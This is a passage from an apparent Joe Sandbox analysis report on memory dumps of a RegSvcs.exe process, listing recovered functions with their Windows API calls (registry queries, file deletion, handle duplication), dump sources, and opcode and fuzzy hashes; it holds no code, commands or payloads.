                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267992
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521289102.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6260000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 6842923-0
                                                                                                    • Opcode ID: 7e8783fb9d39e91a9d1d04e37ca38abae062799bb53e4a0474ab3cd3c675a500
                                                                                                    • Instruction ID: 61621587c3cf0205f226ee7d233e651d7ea599328b0ab1f0c905b9d6bd376767
                                                                                                    • Opcode Fuzzy Hash: 7e8783fb9d39e91a9d1d04e37ca38abae062799bb53e4a0474ab3cd3c675a500
                                                                                                    • Instruction Fuzzy Hash: 7FB1B534911368CFDBA5DF30E88C699B7B6BF49316F1041D9D90AA6340DB399E81CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521986076.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6970000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 947f5deac65ff6fd9c9435b189e3234834214770518e3841b07d670e2d00f795
                                                                                                    • Instruction ID: e24ef1bf4e61565b5f69a2532756ea85576108aff7c92793e7a60e1143d2c53d
                                                                                                    • Opcode Fuzzy Hash: 947f5deac65ff6fd9c9435b189e3234834214770518e3841b07d670e2d00f795
                                                                                                    • Instruction Fuzzy Hash: 6D715C30A10209DFDB58EFB4D4596AEB7B2BF88304F108928D406AB754DF79DE46CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 06972AF9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521986076.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6970000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 3660427363-0
                                                                                                    • Opcode ID: 851758ee832c90343b42c3afbe400c8bb2b3fef68f975c905e546257264fe27f
                                                                                                    • Instruction ID: 85abe696d0514063d134a33fc928d6fbada5adab4593cbfc0d8b1a409b277f1d
                                                                                                    • Opcode Fuzzy Hash: 851758ee832c90343b42c3afbe400c8bb2b3fef68f975c905e546257264fe27f
                                                                                                    • Instruction Fuzzy Hash: 54517B71E103589FCB20CFA9C9846DEBBF5BF49314F24806AE819EB751D7349A45CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521986076.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6970000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: ce57de12184fb8fa398b0b4533403d7d980f574ca6c46f59236cac2769a830bc
                                                                                                    • Instruction ID: b30d9dd80f351533571eb2923d2006984f1c69b2c5ef3d81615b2b122b891663
                                                                                                    • Opcode Fuzzy Hash: ce57de12184fb8fa398b0b4533403d7d980f574ca6c46f59236cac2769a830bc
                                                                                                    • Instruction Fuzzy Hash: 7851A330A002069FCB54EFB4D845AAEB7F6FF88208F148929D4169F255DF34E944CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521986076.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6970000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 4e6eb6aca8c2693f3db5c820339ae6fe6ec68b47627e2ee4f370416997d9fd5d
                                                                                                    • Instruction ID: 91fe28a07feb5081e33a696d1191278fe082503ef40f01c94391c031436f47d6
                                                                                                    • Opcode Fuzzy Hash: 4e6eb6aca8c2693f3db5c820339ae6fe6ec68b47627e2ee4f370416997d9fd5d
                                                                                                    • Instruction Fuzzy Hash: E251F030A24349CFDB58DFA4D8547AEBBB1FF85304F2484AAD4059B251DB38DD46CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521899384.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6900000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 925c54b5e8a66599835c4130d72a561d0dac7e3bb060a8c8d3674e39af2454c3
                                                                                                    • Instruction ID: 374066535d364272dd1236adcf92e07d0ddcb66f2849778bd36cacc552de847c
                                                                                                    • Opcode Fuzzy Hash: 925c54b5e8a66599835c4130d72a561d0dac7e3bb060a8c8d3674e39af2454c3
                                                                                                    • Instruction Fuzzy Hash: F7412371E003599FCB00DBA5D8042EEBBF5EF89220F15816AD409EB750DB789845CBE1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,00000000,?,00000001,?), ref: 0697283C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521986076.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6970000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open
                                                                                                    • String ID:
                                                                                                    • API String ID: 71445658-0
                                                                                                    • Opcode ID: 9757903b8de29d4883f99f6de8a0536997975a566d1a8a515b54f1174ccbf127
                                                                                                    • Instruction ID: ba1a9feb8bc65ec57bdf655501494a4f04e6a61aedbbb2309816ecd11bc328e6
                                                                                                    • Opcode Fuzzy Hash: 9757903b8de29d4883f99f6de8a0536997975a566d1a8a515b54f1174ccbf127
                                                                                                    • Instruction Fuzzy Hash: 60413470D15349DFDB14CFA9C544ACEFBF5AF48304F28816AE808AB741D7759945CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • DeleteFileW.KERNELBASE(00000000), ref: 06266498
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521289102.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6260000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DeleteFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 4033686569-0
                                                                                                    • Opcode ID: 80500e8a30bb88b90e6e01c3e269fe36a6e9a0e28aa682b0e025f598ebf29372
                                                                                                    • Instruction ID: 52ba0f5d9966432f70d5bf1b254b8d7df0bcdad683bfef77bbdd6408ba6d03b6
                                                                                                    • Opcode Fuzzy Hash: 80500e8a30bb88b90e6e01c3e269fe36a6e9a0e28aa682b0e025f598ebf29372
                                                                                                    • Instruction Fuzzy Hash: 5A31B071D0539A9FCB11CF6AC8507DEFFF0EF49220F04816AD844A7642D7789886CBA2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 06972AF9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521986076.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6970000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 3660427363-0
                                                                                                    • Opcode ID: 0247587cf040366eed5ec64cc59e0ddd9d3bbcb58cea85e8021c4fd46a886344
                                                                                                    • Instruction ID: e2405fa81e0eda3ac7572e84e917c6c17874eb53b1cd829a25996c8c7a6cbef6
                                                                                                    • Opcode Fuzzy Hash: 0247587cf040366eed5ec64cc59e0ddd9d3bbcb58cea85e8021c4fd46a886344
                                                                                                    • Instruction Fuzzy Hash: A531C1B1D102589FCB24CF99C984A9EBBF5BF48314F64802AE819AB750D774A945CFA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,00000000,?,00000001,?), ref: 0697283C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521986076.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6970000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open
                                                                                                    • String ID:
                                                                                                    • API String ID: 71445658-0
                                                                                                    • Opcode ID: 59b62e59b78c18bfbae7e32145e6e4ba3a1deb4807aea81c606ade44a549b71f
                                                                                                    • Instruction ID: cbd829c01f4c1356c953ab47eec9da3d73b9c82b52ab52802b4e622f27f05ee7
                                                                                                    • Opcode Fuzzy Hash: 59b62e59b78c18bfbae7e32145e6e4ba3a1deb4807aea81c606ade44a549b71f
                                                                                                    • Instruction Fuzzy Hash: DD311FB0D112499FDB14CF99C584ACEFBF5BF48314F28816EE809AB741C775A985CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0690C8EF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521899384.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6900000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DuplicateHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 3793708945-0
                                                                                                    • Opcode ID: d2471e8df5ea1aec3029322fad050b46a0841b7ced8d7829bf825e10c3950eef
                                                                                                    • Instruction ID: cbd2b7d6fdcc65b8824050678396ccea7f1db40bdd48f5b1fe4d3015071bdbae
                                                                                                    • Opcode Fuzzy Hash: d2471e8df5ea1aec3029322fad050b46a0841b7ced8d7829bf825e10c3950eef
                                                                                                    • Instruction Fuzzy Hash: 3A21F3B5D00248EFDB10CFA9D884ADEBFF4EB48324F24811AE815A3750D378A954CF64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0690C8EF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521899384.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6900000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DuplicateHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 3793708945-0
                                                                                                    • Opcode ID: cee3337233c09230027a61a0e62960c1c8c286e0ec7b152266c47e9b53e7df60
                                                                                                    • Instruction ID: d431a0e3a35d336ec76c632323445ea2758bc9f3c0bdca27f4d0d32d943009d3
                                                                                                    • Opcode Fuzzy Hash: cee3337233c09230027a61a0e62960c1c8c286e0ec7b152266c47e9b53e7df60
                                                                                                    • Instruction Fuzzy Hash: 9F21E3B5D00208AFDB10CF99D884ADEBBF8EB48324F14801AE815A3750D378A954CFA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • DeleteFileW.KERNELBASE(00000000), ref: 06266498
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521289102.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6260000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DeleteFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 4033686569-0
                                                                                                    • Opcode ID: 39721e51969cdfdcac2babd2053fc914d61d2c47adb0350834ea43e0123c09a6
                                                                                                    • Instruction ID: 605362216526ea39a79392d351c5a708f5aca78991055729b74b995404e4eb67
                                                                                                    • Opcode Fuzzy Hash: 39721e51969cdfdcac2babd2053fc914d61d2c47adb0350834ea43e0123c09a6
                                                                                                    • Instruction Fuzzy Hash: 262135B1C0061A9FCB10CF9AC4447EEFBB4EF48224F108129E819B7740D778A945CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,06907E62), ref: 06907F4F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521899384.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6900000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: GlobalMemoryStatus
                                                                                                    • String ID:
                                                                                                    • API String ID: 1890195054-0
                                                                                                    • Opcode ID: 05422472bdcfa1df963455c2bf6ef9fc2654c840eac1450e203b6bbf99bc8242
                                                                                                    • Instruction ID: c730bf840694f745f74bd5bce2bbf26e8e58c3f9e14f395b275ae6b9c520c867
                                                                                                    • Opcode Fuzzy Hash: 05422472bdcfa1df963455c2bf6ef9fc2654c840eac1450e203b6bbf99bc8242
                                                                                                    • Instruction Fuzzy Hash: DE11F2B1D006599FDB10CF9AC4447EEFBF4AB48224F15812AD819B7740D378A955CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.522194275.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_69a0000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e59d0aab17c37bb296c1bfb79abb777781c6983a546188042bf52e2dd7414fe2
                                                                                                    • Instruction ID: cdcfd485bd490a39ee93a478f6199e38afdf80a5aa01fc5a3ef70a6ef8d7a934
                                                                                                    • Opcode Fuzzy Hash: e59d0aab17c37bb296c1bfb79abb777781c6983a546188042bf52e2dd7414fe2
                                                                                                    • Instruction Fuzzy Hash: 9AF17C30B003048FCB54DBB8D8446ADB7F6EF89214F258469E50ADB791EB74DD46CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.522194275.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_69a0000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 411da73bdcc417c050c79a5753e2a9df3e2db23d182864bde0dbc81fe0021ec8
                                                                                                    • Instruction ID: 2a25bc4c902da82648471e3ccfee81d49db59d3887c3c8f97e15195b5a2f8caf
                                                                                                    • Opcode Fuzzy Hash: 411da73bdcc417c050c79a5753e2a9df3e2db23d182864bde0dbc81fe0021ec8
                                                                                                    • Instruction Fuzzy Hash: D3B1A230B003158FCB65DB74D4546AEBBF2AF89304F2584A9D50ADB385EB38DD46CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.522194275.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_69a0000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 49095a4f3b6fc9f6d4e14ee846502f7f59523f50f086715d4b37ab89d0f52589
                                                                                                    • Instruction ID: 26a1f84427abe373a69c14d3c1f48bf3c36c2a63ceb3318a2a28f8ee465f0e83
                                                                                                    • Opcode Fuzzy Hash: 49095a4f3b6fc9f6d4e14ee846502f7f59523f50f086715d4b37ab89d0f52589
                                                                                                    • Instruction Fuzzy Hash: 4AA16A75A04349DFCF55CFA8C854ADEBFF2BF89310F14815AE805ABA61D7309859CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.522194275.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_69a0000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c9db1b1df203fdb9495ac6b4e366e2f2a54253834f7e41eaf6ab936452d6e2d1
                                                                                                    • Instruction ID: 96df4418da1cfafc8b4c89025290936a01d9c06d30ea2c6f6f3e113725952746
                                                                                                    • Opcode Fuzzy Hash: c9db1b1df203fdb9495ac6b4e366e2f2a54253834f7e41eaf6ab936452d6e2d1
                                                                                                    • Instruction Fuzzy Hash: AB710330F043408FEB60CB28C55479DBBE6AF85318F28C16AD4599F78AEB76C845CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.522194275.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_69a0000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 68aa102f19b78c9a4e2c30cf18af00e1f06ca2424ea20d8ff5dd80abfd8af71a
                                                                                                    • Instruction ID: c14ef14f8bc063a8c9649fb9c4b02503099a54fa3c758e7e0f5935f0f6fe10f4
                                                                                                    • Opcode Fuzzy Hash: 68aa102f19b78c9a4e2c30cf18af00e1f06ca2424ea20d8ff5dd80abfd8af71a
                                                                                                    • Instruction Fuzzy Hash: 9B714B34B102058FDB95DF29C898A6E7BF9EF59244B2940A5E805CBB71DB70EC45CBD0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.522194275.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_69a0000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 476776309ba8bb4ca8608773c4db245a088ac5e6542ba071cd6291422ac6c1fb
                                                                                                    • Instruction ID: 44dc41abfa749e4ab46fb75142f67319bedde50b1bdccd8e3f6bba0d490b26ac
                                                                                                    • Opcode Fuzzy Hash: 476776309ba8bb4ca8608773c4db245a088ac5e6542ba071cd6291422ac6c1fb
                                                                                                    • Instruction Fuzzy Hash: 60811938900348DFCB10EFF6D85559DBBB1EF48314B118966D824AF364DB38AE85CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.522194275.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_69a0000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 28afc7432160448b57395a882d8a112ea16858f0e13fb852f302d506f6a56250
                                                                                                    • Instruction ID: 6f83ae95c38b70df3534380819ad0e2cd8a0aea4c8731e14e881587022054bd9
                                                                                                    • Opcode Fuzzy Hash: 28afc7432160448b57395a882d8a112ea16858f0e13fb852f302d506f6a56250
                                                                                                    • Instruction Fuzzy Hash: 08518630B0D3C04FD762873595543997FE68B92248F2D80EBC199CF697D67AD84AC3A2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.522194275.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_69a0000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 10e74c28294e5131887e743a63740593c21329dc3544e1b119aabb771110fc6d
                                                                                                    • Instruction ID: 58f1e521199916eafdb0b784c640ede7999e66371cda19fd6fc4e6f90e0848fd
                                                                                                    • Opcode Fuzzy Hash: 10e74c28294e5131887e743a63740593c21329dc3544e1b119aabb771110fc6d
                                                                                                    • Instruction Fuzzy Hash: BD519278900208DFCB54EFF6E4965DDBBB1EF48314B118925D825AB324DB386E85CFA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.522194275.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_69a0000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 281864a1900ec46e54d79b9fa1955ee9cf4ed8a927752b30c178d631693468fb
                                                                                                    • Instruction ID: 3fd6b1d40505c7444a3f95309fdb49edd36dcf41f376c5286cae10c73c29d4e4
                                                                                                    • Opcode Fuzzy Hash: 281864a1900ec46e54d79b9fa1955ee9cf4ed8a927752b30c178d631693468fb
                                                                                                    • Instruction Fuzzy Hash: 1F41CE31A04349DFCF11CFA4C854A9EBFF2AF89324F148056E8459BAA1D331E918CBE0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.522194275.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_69a0000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d20f478bfdffc5167043be4acb261e1488aa534403b3700813708aa11866fcaf
                                                                                                    • Instruction ID: c04afe6ec878aacdb3686f59645f54417748d5d93e18db57d425e59cc605cff7
                                                                                                    • Opcode Fuzzy Hash: d20f478bfdffc5167043be4acb261e1488aa534403b3700813708aa11866fcaf
                                                                                                    • Instruction Fuzzy Hash: 12312131F093548FC7519B78D81039E7BF5AF85210F1484A6D588DB292EB348D85CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.522194275.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_69a0000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a3a3a4ef3cfb671296f777f987f60db2881072bef91195473044cc424dbc2c53
                                                                                                    • Instruction ID: 97c81db94672bf409b259d0a9966f6f1ff416fa7d012b3e0137d9209a5789c69
                                                                                                    • Opcode Fuzzy Hash: a3a3a4ef3cfb671296f777f987f60db2881072bef91195473044cc424dbc2c53
                                                                                                    • Instruction Fuzzy Hash: C931A0B9A05289DFCB089BA4DC119EDFBB1FFC9340F09896BD459A7781DA314904CBD2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.522194275.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_69a0000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5f047297b3f78818a9756f3af9c33eed95a3abcafb6a82c350cdbb38636f7fe4
                                                                                                    • Instruction ID: 205bd496d49394cafa29621774f8d8ec7fe91a6beb83e2f9586786d5c6379cc4
                                                                                                    • Opcode Fuzzy Hash: 5f047297b3f78818a9756f3af9c33eed95a3abcafb6a82c350cdbb38636f7fe4
                                                                                                    • Instruction Fuzzy Hash: A331A030E013499FCB90DFA8D544AAEBBF2EB89314F25846AD549DB341E734DD45CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.522194275.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_69a0000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2acb2b50274b846bdfde8401899dc532dcf4fabb84eac2d55dbe71db45f52e1a
                                                                                                    • Instruction ID: 94682f0f26aad06b4faabccd981c9057aa2551aa4221d0e933a5c773201cc6e8
                                                                                                    • Opcode Fuzzy Hash: 2acb2b50274b846bdfde8401899dc532dcf4fabb84eac2d55dbe71db45f52e1a
                                                                                                    • Instruction Fuzzy Hash: 33116D71E012199FCB54DFA5E5849EDBBF2EB88314F25852AD505A7200D330A945CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.522194275.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_69a0000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1edee7ba40850fd2e6a2fc0bd45e5626598118bd129aaa730ee8079754a473a0
                                                                                                    • Instruction ID: ac38a676bf77dc715deb61b1c1dd82a4fd5840d4f2e8eda283a7433a86a5ba90
                                                                                                    • Opcode Fuzzy Hash: 1edee7ba40850fd2e6a2fc0bd45e5626598118bd129aaa730ee8079754a473a0
                                                                                                    • Instruction Fuzzy Hash: CE11B131B043469BDB50CFA8C840B9BBBE7EF85374F148155D4189BA92D371E818CBE4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.522194275.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_69a0000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9d647eb8b01102d2fcda80b4949ac8a79418bbf98364632615431452064cef10
                                                                                                    • Instruction ID: 2c1dd79d00a65901d30c2c4ca81b6292d9e31618390b90902a152b3e65c5a4fc
                                                                                                    • Opcode Fuzzy Hash: 9d647eb8b01102d2fcda80b4949ac8a79418bbf98364632615431452064cef10
